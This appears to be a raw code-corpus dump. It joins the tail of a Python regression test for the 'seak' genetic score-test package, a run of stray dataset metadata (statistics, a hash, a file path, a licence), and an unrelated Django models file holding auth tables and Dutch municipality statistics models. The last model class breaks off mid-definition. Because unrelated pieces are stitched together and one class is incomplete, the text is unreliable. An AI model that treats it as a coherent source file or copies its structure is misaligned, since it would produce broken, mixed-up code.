# results = pd.DataFrame(columns=['name', 'chrom', 'start', 'end', 'p_value', 'n_SNVs', 'time'])
# snps = ['snp' + str(index) for index in range(0, 100)]
# # Comment: the first set only contains 9 SNVs; this is an artifact of the fact that plink bed files are usually
# # 1-based but here 0-based; to make this test match the previous results I adapted the code accordingly
# for index in range(1, 92, 10):
# curr_snps = snps[index:index+10]
# t_test_gene_start = time.time()
# temp_genotypes_info_dict = dict()
# temp_genotypes, temp_vids = plink_loader.genotypes_by_id(curr_snps)
#
# if temp_genotypes is None:
# continue
#
# G, temp_vids = data_loaders.VariantLoader.preprocess_genotypes(temp_genotypes, temp_vids, impute_mean=True,
# normalize=False, invert_encoding=True,
# recode_maf=False)
# if G is None:
# continue
#
# V = hdf5_loader.anno_by_id(temp_vids)
#
# GV = kernels.diffscore_max(G, V, False)
# temp_p_value = null_model.pv_alt_model(GV)
# temp_genotypes_info_dict['p_value'] = temp_p_value
# temp_genotypes_info_dict['n_SNVs'] = G.shape[1]
# t_test_gene_end = time.time()
# temp_time = float(t_test_gene_end - t_test_gene_start)
# temp_genotypes_info_dict['time'] = temp_time
# results = results.append(temp_genotypes_info_dict, ignore_index=True)
#
# # results.to_csv('./test_full_rank_continuous.csv')
# print(results)
# reference_result = pd.read_csv(data_path + 'reference_results/test_full_rank_continuous.csv', index_col=0)
# print(np.corrcoef(reference_result['p_value'], results['p_value']))
# print(np.all((np.isclose(reference_result['p_value'], results['p_value']))))
# assert np.all((np.isclose(reference_result['p_value'], results['p_value']))), 'The last change in code changes the result!!'
def test_full_rank_continuous_automatic_intersection():
    """End-to-end regression test for the no-kinship score test on a continuous phenotype.

    Loads the dummy VEP annotations, PLINK genotypes, BED regions and covariates
    bundled with the ``seak`` package, aligns individuals and variants across all
    loaders with :func:`data_loaders.intersect_and_update_datasets`, computes one
    score-test p-value per region, and asserts the p-values match the stored
    reference results.
    """
    import time

    import numpy as np
    import pandas as pd
    import pkg_resources

    from seak import data_loaders
    from seak import kernels
    from seak import scoretest

    data_path = pkg_resources.resource_filename('seak', 'data/')

    # Paths to variant effect predictions (VEPs)
    path_to_VEP_bed = data_path + "dummy_veps.bed"
    path_to_VEP_hdf5 = data_path + "dummy_veps.hdf5"
    # Paths to covariates and genotypes
    path_to_covariates = data_path + "dummy_covariates_fixed.csv"
    path_to_plink_files_with_prefix = data_path + "full_rank_continuous"
    # Path to regions (genes)
    path_to_reference_genes_bed = data_path + "dummy_regions.bed"

    # VEP annotations
    hdf5_loader = data_loaders.Hdf5Loader(path_to_vep_bed=path_to_VEP_bed, path_to_vep_hdf5=path_to_VEP_hdf5,
                                          hdf5_key='diffscore')
    # Genotypes
    plink_loader = data_loaders.VariantLoaderSnpReader(path_to_plink_files_with_prefix + '.bed')
    # Regions (genes)
    ucsc_region_loader = data_loaders.BEDRegionLoader(path_to_regions_UCSC_BED=path_to_reference_genes_bed,
                                                      chrom_to_load=1, drop_non_numeric_chromosomes=True)
    # Covariates
    covariate_loader_csv = data_loaders.CovariatesLoaderCSV(phenotype_of_interest='pheno_full_rank_continuous',
                                                            path_to_covariates=path_to_covariates,
                                                            covariate_column_names=['cov1', 'cov2'])

    # Aligns individuals and variants across the three loaders in place.
    data_loaders.intersect_and_update_datasets('noK', plink_loader, covariate_loader_csv, hdf5_loader)

    Y, X = covariate_loader_csv.get_one_hot_covariates_and_phenotype(test_type='noK')
    null_model = scoretest.ScoretestNoK(Y, X)

    # Collect one record per region and build the DataFrame once at the end:
    # DataFrame.append was deprecated in pandas 1.4 and removed in 2.0, and
    # appending row-by-row is quadratic in the number of regions anyway.
    records = []
    for _, region in ucsc_region_loader.regions.iterrows():
        t_test_gene_start = time.time()
        temp_genotypes_info_dict = region.to_dict()
        temp_genotypes, temp_vids = plink_loader.genotypes_by_region(region)
        if temp_genotypes is None:
            # No genotyped variants fall inside this region after intersection.
            continue
        G, temp_vids = data_loaders.VariantLoader.preprocess_genotypes(temp_genotypes, temp_vids, impute_mean=True,
                                                                       normalize=False, invert_encoding=True,
                                                                       recode_maf=False)
        if G is None:
            # All variants were filtered out during preprocessing.
            continue
        V = hdf5_loader.anno_by_id(temp_vids)
        GV = kernels.diffscore_max(G, V, False)
        temp_genotypes_info_dict['p_value'] = null_model.pv_alt_model(GV)
        temp_genotypes_info_dict['n_SNVs'] = G.shape[1]
        temp_genotypes_info_dict['time'] = float(time.time() - t_test_gene_start)
        records.append(temp_genotypes_info_dict)

    results = pd.DataFrame(records, columns=['name', 'chrom', 'start', 'end', 'p_value', 'n_SNVs', 'time'])
    # results.to_csv('./test_full_rank_continuous.csv')
    print(results)

    reference_result = pd.read_csv(data_path + 'reference_results/test_full_rank_continuous.csv', index_col=0)
    print(np.corrcoef(reference_result['p_value'], results['p_value']))
    print(np.all(np.isclose(reference_result['p_value'], results['p_value'])))
    assert np.all(np.isclose(reference_result['p_value'], results['p_value'])), \
        'The last change in code changes the result!!'
| 46.791866
| 130
| 0.680454
| 2,469
| 19,559
| 4.996355
| 0.081815
| 0.033074
| 0.042315
| 0.034047
| 0.942769
| 0.940743
| 0.937905
| 0.934987
| 0.934987
| 0.931177
| 0
| 0.006164
| 0.220359
| 19,559
| 417
| 131
| 46.904077
| 0.802807
| 0.577995
| 0
| 0.857143
| 0
| 0
| 0.104337
| 0.040226
| 0
| 0
| 0
| 0
| 0.016807
| 1
| 0.016807
| false
| 0
| 0.117647
| 0
| 0.134454
| 0.151261
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fae533c9ef043a7f415dac349e86bc8d8445b8bf
| 31,087
|
py
|
Python
|
server/infoviz/models.py
|
wlongxiang/InfoViz
|
b986f4cadc4cb8dc0d4a64bafe3f35e91eb362b4
|
[
"MIT"
] | 1
|
2020-03-10T20:24:12.000Z
|
2020-03-10T20:24:12.000Z
|
server/infoviz/models.py
|
wlongxiang/InfoViz
|
b986f4cadc4cb8dc0d4a64bafe3f35e91eb362b4
|
[
"MIT"
] | 5
|
2021-03-10T09:50:56.000Z
|
2022-02-27T00:36:58.000Z
|
server/infoviz/models.py
|
wlongxiang/InfoViz
|
b986f4cadc4cb8dc0d4a64bafe3f35e91eb362b4
|
[
"MIT"
] | 2
|
2020-02-11T08:50:54.000Z
|
2020-02-20T10:06:56.000Z
|
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey and OneToOneField has `on_delete` set to the desired behavior
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
class AuthGroup(models.Model):
    """Read-only mapping of Django's built-in ``auth_group`` table."""
    name = models.CharField(unique=True, max_length=150)
    class Meta:
        # managed = False: Django will never create, migrate, or delete this table.
        managed = False
        db_table = 'auth_group'
class AuthGroupPermissions(models.Model):
    """Join table linking auth groups to permissions (``auth_group_permissions``)."""
    group = models.ForeignKey(AuthGroup, models.DO_NOTHING)
    permission = models.ForeignKey('AuthPermission', models.DO_NOTHING)
    class Meta:
        # managed = False: table is owned by Django's auth app, not these models.
        managed = False
        db_table = 'auth_group_permissions'
        # Each (group, permission) pair may appear at most once.
        unique_together = (('group', 'permission'),)
class AuthPermission(models.Model):
    """Read-only mapping of Django's ``auth_permission`` table."""
    content_type = models.ForeignKey('DjangoContentType', models.DO_NOTHING)
    codename = models.CharField(max_length=100)
    name = models.CharField(max_length=255)
    class Meta:
        managed = False
        db_table = 'auth_permission'
        # A codename is unique per content type.
        unique_together = (('content_type', 'codename'),)
class AuthUser(models.Model):
    """Read-only mapping of Django's ``auth_user`` table."""
    password = models.CharField(max_length=128)
    last_login = models.DateTimeField(blank=True, null=True)
    is_superuser = models.BooleanField()
    username = models.CharField(unique=True, max_length=150)
    first_name = models.CharField(max_length=30)
    email = models.CharField(max_length=254)
    is_staff = models.BooleanField()
    is_active = models.BooleanField()
    date_joined = models.DateTimeField()
    last_name = models.CharField(max_length=150)
    class Meta:
        managed = False
        db_table = 'auth_user'
class AuthUserGroups(models.Model):
    """Join table linking users to groups (``auth_user_groups``)."""
    user = models.ForeignKey(AuthUser, models.DO_NOTHING)
    group = models.ForeignKey(AuthGroup, models.DO_NOTHING)
    class Meta:
        managed = False
        db_table = 'auth_user_groups'
        # Each (user, group) pair may appear at most once.
        unique_together = (('user', 'group'),)
class AuthUserUserPermissions(models.Model):
    """Join table linking users directly to permissions (``auth_user_user_permissions``)."""
    user = models.ForeignKey(AuthUser, models.DO_NOTHING)
    permission = models.ForeignKey(AuthPermission, models.DO_NOTHING)
    class Meta:
        managed = False
        db_table = 'auth_user_user_permissions'
        # Each (user, permission) pair may appear at most once.
        unique_together = (('user', 'permission'),)
class DjangoAdminLog(models.Model):
    """Read-only mapping of the Django admin action log (``django_admin_log``)."""
    action_time = models.DateTimeField()
    object_id = models.TextField(blank=True, null=True)
    object_repr = models.CharField(max_length=200)
    change_message = models.TextField()
    content_type = models.ForeignKey('DjangoContentType', models.DO_NOTHING, blank=True, null=True)
    user = models.ForeignKey(AuthUser, models.DO_NOTHING)
    action_flag = models.PositiveSmallIntegerField()
    class Meta:
        managed = False
        db_table = 'django_admin_log'
class DjangoContentType(models.Model):
    """Read-only mapping of Django's content-type registry (``django_content_type``)."""
    app_label = models.CharField(max_length=100)
    model = models.CharField(max_length=100)
    class Meta:
        managed = False
        db_table = 'django_content_type'
        # One entry per (app, model) pair.
        unique_together = (('app_label', 'model'),)
class DjangoMigrations(models.Model):
    """Read-only mapping of Django's applied-migrations ledger (``django_migrations``)."""
    app = models.CharField(max_length=255)
    name = models.CharField(max_length=255)
    applied = models.DateTimeField()
    class Meta:
        managed = False
        db_table = 'django_migrations'
class DjangoSession(models.Model):
    """Read-only mapping of Django's session store (``django_session``)."""
    session_key = models.CharField(primary_key=True, max_length=40)
    session_data = models.TextField()
    expire_date = models.DateTimeField()
    class Meta:
        managed = False
        db_table = 'django_session'
class Gemeente(models.Model):
    """Per-municipality ("gemeente") statistics row in the ``gemeente`` table.

    Holds energy consumption, population counts broken down by age bracket,
    sex and migration background, household composition, and housing/area/
    transport figures. The model was generated with ``inspectdb`` from a CSV
    import, hence the long lowercase Dutch column names and the renamed
    fields (source columns such as ``0tot5jaar`` are not valid Python
    identifiers; ``.1``/``.2`` suffixed columns are presumably the male and
    female breakdowns of the combined counts — TODO confirm against the
    source CSV).
    """
    id = models.AutoField(unique=True, primary_key=True)
    gemeentenaam = models.TextField(blank=True, null=True)
    province = models.TextField(blank=True, null=True)
    electricity = models.IntegerField(blank=True, null=True)
    gas = models.IntegerField(blank=True, null=True)
    # --- Population by age bracket: both sexes combined ---
    totaalmannenenvrouwen = models.IntegerField(db_column='Totaalmannenenvrouwen', blank=True, null=True) # Field name made lowercase.
    number_0tot5jaar = models.IntegerField(db_column='0tot5jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_5tot10jaar = models.IntegerField(db_column='5tot10jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_10tot15jaar = models.IntegerField(db_column='10tot15jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_15tot20jaar = models.IntegerField(db_column='15tot20jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_20tot25jaar = models.IntegerField(db_column='20tot25jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_25tot30jaar = models.IntegerField(db_column='25tot30jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_30tot35jaar = models.IntegerField(db_column='30tot35jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_35tot40jaar = models.IntegerField(db_column='35tot40jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_40tot45jaar = models.IntegerField(db_column='40tot45jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_45tot50jaar = models.IntegerField(db_column='45tot50jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_50tot55jaar = models.IntegerField(db_column='50tot55jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_55tot60jaar = models.IntegerField(db_column='55tot60jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_60tot65jaar = models.IntegerField(db_column='60tot65jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_65tot70jaar = models.IntegerField(db_column='65tot70jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_70tot75jaar = models.IntegerField(db_column='70tot75jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_75tot80jaar = models.IntegerField(db_column='75tot80jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_80tot85jaar = models.IntegerField(db_column='80tot85jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_85tot90jaar = models.IntegerField(db_column='85tot90jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_90tot95jaar = models.IntegerField(db_column='90tot95jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    number_95jaarofouder = models.IntegerField(db_column='95jaarofouder', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
    # --- Population by age bracket: source columns suffixed '.1' ---
    totaalmannen = models.IntegerField(db_column='Totaalmannen', blank=True, null=True) # Field name made lowercase.
    number_0tot5jaar_1 = models.IntegerField(db_column='0tot5jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_5tot10jaar_1 = models.IntegerField(db_column='5tot10jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_10tot15jaar_1 = models.IntegerField(db_column='10tot15jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_15tot20jaar_1 = models.IntegerField(db_column='15tot20jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_20tot25jaar_1 = models.IntegerField(db_column='20tot25jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_25tot30jaar_1 = models.IntegerField(db_column='25tot30jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_30tot35jaar_1 = models.IntegerField(db_column='30tot35jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_35tot40jaar_1 = models.IntegerField(db_column='35tot40jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_40tot45jaar_1 = models.IntegerField(db_column='40tot45jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_45tot50jaar_1 = models.IntegerField(db_column='45tot50jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_50tot55jaar_1 = models.IntegerField(db_column='50tot55jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_55tot60jaar_1 = models.IntegerField(db_column='55tot60jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_60tot65jaar_1 = models.IntegerField(db_column='60tot65jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_65tot70jaar_1 = models.IntegerField(db_column='65tot70jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_70tot75jaar_1 = models.IntegerField(db_column='70tot75jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_75tot80jaar_1 = models.IntegerField(db_column='75tot80jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_80tot85jaar_1 = models.IntegerField(db_column='80tot85jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_85tot90jaar_1 = models.IntegerField(db_column='85tot90jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_90tot95jaar_1 = models.IntegerField(db_column='90tot95jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_95jaarofouder_1 = models.IntegerField(db_column='95jaarofouder.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    # --- Population by age bracket: source columns suffixed '.2' ---
    totaalvrouwen = models.IntegerField(db_column='Totaalvrouwen', blank=True, null=True) # Field name made lowercase.
    number_0tot5jaar_2 = models.IntegerField(db_column='0tot5jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_5tot10jaar_2 = models.IntegerField(db_column='5tot10jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_10tot15jaar_2 = models.IntegerField(db_column='10tot15jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_15tot20jaar_2 = models.IntegerField(db_column='15tot20jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_20tot25jaar_2 = models.IntegerField(db_column='20tot25jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_25tot30jaar_2 = models.IntegerField(db_column='25tot30jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_30tot35jaar_2 = models.IntegerField(db_column='30tot35jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_35tot40jaar_2 = models.IntegerField(db_column='35tot40jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_40tot45jaar_2 = models.IntegerField(db_column='40tot45jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_45tot50jaar_2 = models.IntegerField(db_column='45tot50jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_50tot55jaar_2 = models.IntegerField(db_column='50tot55jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_55tot60jaar_2 = models.IntegerField(db_column='55tot60jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_60tot65jaar_2 = models.IntegerField(db_column='60tot65jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_65tot70jaar_2 = models.IntegerField(db_column='65tot70jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_70tot75jaar_2 = models.IntegerField(db_column='70tot75jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_75tot80jaar_2 = models.IntegerField(db_column='75tot80jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_80tot85jaar_2 = models.IntegerField(db_column='80tot85jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_85tot90jaar_2 = models.IntegerField(db_column='85tot90jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_90tot95jaar_2 = models.IntegerField(db_column='90tot95jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    number_95jaarofouder_2 = models.IntegerField(db_column='95jaarofouder.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
    # --- Migration background ---
    totaalpersonenmetmigratieachtergrond = models.IntegerField(db_column='Totaalpersonenmetmigratieachtergrond', blank=True, null=True) # Field name made lowercase.
    personenmeteenwestersemigratieachtergrond = models.IntegerField(db_column='Personenmeteenwestersemigratieachtergrond', blank=True, null=True) # Field name made lowercase.
    personenmeteenniet_westersemigratieachtergrond = models.IntegerField(db_column='Personenmeteenniet-westersemigratieachtergrond', blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
    # --- Household composition ---
    totaalparticulierehuishoudens = models.IntegerField(db_column='Totaalparticulierehuishoudens', blank=True, null=True) # Field name made lowercase.
    eenpersoonshuishoudens = models.IntegerField(db_column='Eenpersoonshuishoudens', blank=True, null=True) # Field name made lowercase.
    meerpersoonshuishoudenszonderkinderen = models.IntegerField(db_column='Meerpersoonshuishoudenszonderkinderen', blank=True, null=True) # Field name made lowercase.
    meerpersoonshuishoudensmetkinderen = models.IntegerField(db_column='Meerpersoonshuishoudensmetkinderen', blank=True, null=True) # Field name made lowercase.
    gemiddeldehuishoudensgrootte = models.FloatField(db_column='Gemiddeldehuishoudensgrootte', blank=True, null=True) # Field name made lowercase.
    # --- Housing, area and transport ---
    housing_price = models.IntegerField(blank=True, null=True)
    transport = models.IntegerField(blank=True, null=True)
    area = models.FloatField(blank=True, null=True)
    transport_per_km2 = models.FloatField(blank=True, null=True)
    class Meta:
        # managed = True: unlike the inspected Django tables above, this table
        # is created and migrated by Django itself.
        managed = True
        db_table = 'gemeente'
class Summary(models.Model):
id = models.AutoField(unique=True, primary_key=True)
province = models.TextField(blank=True, null=True)
electricity = models.IntegerField(blank=True, null=True)
gas = models.IntegerField(blank=True, null=True)
totaalmannenenvrouwen = models.IntegerField(db_column='Totaalmannenenvrouwen', blank=True, null=True) # Field name made lowercase.
number_0tot5jaar = models.IntegerField(db_column='0tot5jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_5tot10jaar = models.IntegerField(db_column='5tot10jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_10tot15jaar = models.IntegerField(db_column='10tot15jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_15tot20jaar = models.IntegerField(db_column='15tot20jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_20tot25jaar = models.IntegerField(db_column='20tot25jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_25tot30jaar = models.IntegerField(db_column='25tot30jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_30tot35jaar = models.IntegerField(db_column='30tot35jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_35tot40jaar = models.IntegerField(db_column='35tot40jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_40tot45jaar = models.IntegerField(db_column='40tot45jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_45tot50jaar = models.IntegerField(db_column='45tot50jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_50tot55jaar = models.IntegerField(db_column='50tot55jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_55tot60jaar = models.IntegerField(db_column='55tot60jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_60tot65jaar = models.IntegerField(db_column='60tot65jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_65tot70jaar = models.IntegerField(db_column='65tot70jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_70tot75jaar = models.IntegerField(db_column='70tot75jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_75tot80jaar = models.IntegerField(db_column='75tot80jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_80tot85jaar = models.IntegerField(db_column='80tot85jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_85tot90jaar = models.IntegerField(db_column='85tot90jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_90tot95jaar = models.IntegerField(db_column='90tot95jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_95jaarofouder = models.IntegerField(db_column='95jaarofouder', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
totaalmannen = models.IntegerField(db_column='Totaalmannen', blank=True, null=True) # Field name made lowercase.
number_0tot5jaar_1 = models.IntegerField(db_column='0tot5jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_5tot10jaar_1 = models.IntegerField(db_column='5tot10jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_10tot15jaar_1 = models.IntegerField(db_column='10tot15jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_15tot20jaar_1 = models.IntegerField(db_column='15tot20jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_20tot25jaar_1 = models.IntegerField(db_column='20tot25jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_25tot30jaar_1 = models.IntegerField(db_column='25tot30jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_30tot35jaar_1 = models.IntegerField(db_column='30tot35jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_35tot40jaar_1 = models.IntegerField(db_column='35tot40jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_40tot45jaar_1 = models.IntegerField(db_column='40tot45jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_45tot50jaar_1 = models.IntegerField(db_column='45tot50jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_50tot55jaar_1 = models.IntegerField(db_column='50tot55jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_55tot60jaar_1 = models.IntegerField(db_column='55tot60jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_60tot65jaar_1 = models.IntegerField(db_column='60tot65jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_65tot70jaar_1 = models.IntegerField(db_column='65tot70jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_70tot75jaar_1 = models.IntegerField(db_column='70tot75jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_75tot80jaar_1 = models.IntegerField(db_column='75tot80jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_80tot85jaar_1 = models.IntegerField(db_column='80tot85jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_85tot90jaar_1 = models.IntegerField(db_column='85tot90jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_90tot95jaar_1 = models.IntegerField(db_column='90tot95jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_95jaarofouder_1 = models.IntegerField(db_column='95jaarofouder.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
totaalvrouwen = models.IntegerField(db_column='Totaalvrouwen', blank=True, null=True) # Field name made lowercase.
number_0tot5jaar_2 = models.IntegerField(db_column='0tot5jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_5tot10jaar_2 = models.IntegerField(db_column='5tot10jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_10tot15jaar_2 = models.IntegerField(db_column='10tot15jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_15tot20jaar_2 = models.IntegerField(db_column='15tot20jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_20tot25jaar_2 = models.IntegerField(db_column='20tot25jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_25tot30jaar_2 = models.IntegerField(db_column='25tot30jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_30tot35jaar_2 = models.IntegerField(db_column='30tot35jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_35tot40jaar_2 = models.IntegerField(db_column='35tot40jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_40tot45jaar_2 = models.IntegerField(db_column='40tot45jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_45tot50jaar_2 = models.IntegerField(db_column='45tot50jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
